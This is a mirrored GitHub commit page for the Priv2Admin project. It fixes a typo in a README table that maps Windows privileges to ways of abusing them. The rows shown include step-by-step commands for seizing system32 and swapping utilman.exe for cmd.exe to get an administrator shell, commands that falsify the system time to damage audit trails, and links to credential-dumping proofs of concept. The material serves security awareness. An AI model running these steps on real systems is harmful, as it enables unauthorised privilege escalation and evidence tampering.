Mirrors/Priv2Admin
2
0
Fork 0
mirror of https://github.com/gtworek/Priv2Admin synced 2024-11-12 22:47:15 +00:00
Code Issues Projects Releases Packages Wiki Activity

Typo in one of commands, spotted by SchneiderSteffen.

Browse source
This commit is contained in:
Grzegorz Tworek 2022-09-23 09:55:00 +02:00 committed by GitHub
parent 758de4463f
commit 7ae7a718dd
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
README.md
View file

@ -55,7 +55,7 @@ Feel free to contribute and/or discuss presented ideas.
|`SeSystemEnvironment`| _Unknown_ | 3rd party tool | The privilege permits to use `NtSetSystemEnvironmentValue`, `NtModifyDriverEntry` and some other syscalls to manipulate UEFI variables. |The privilege is required to run sysprep.exe.<p>Additionally:<br>- Firmware environment variables were commonly used on non-Intel platforms in the past, and now slowly return to UEFI world. <br>- The area is highly undocumented.<br>- The potential may be huge (i.e. breaking Secure Boot) but raising the impact level requires at least PoC.<br> - see [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeSystemEnvironmentPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |
|`SeSystemProfile`| ? | ? | ? ||
|`SeSystemtime`| **Threat** | ***Built-in commands*** | `cmd.exe /c date 01-01-01`<br>`cmd.exe /c time 00:00` | The privilege allows to change the system time, potentially leading to audit trail integrity issues, as events will be stored with wrong date/time.<br>- Be careful with date/time formats. Use always-safe values if not sure.<br>- Sometimes the name of the privilege uses uppercase "T" and is referred as `SeSystemTime`. |
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.<br> - See [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeTakeOwnershipPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icacls.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.<br> - See [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeTakeOwnershipPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |
|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. | Sample code+exe creating arbitrary tokens to be found at [PsBits](https://github.com/gtworek/PSBits/tree/master/VirtualAccounts). |
|`SeTimeZone`| Mess | ***Built-in commands*** | Change the timezone. `tzutil /s "Chatham Islands Standard Time"` ||
|`SeTrustedCredManAccess`| **Threat** | 3rd party tool | Dumping credentials from Credential Manager | Great [blog post](https://www.tiraniddo.dev/2021/05/dumping-stored-credentials-with.html) by [@tiraniddo](https://twitter.com/tiraniddo).<br> - see [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeTrustedCredManAccessPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |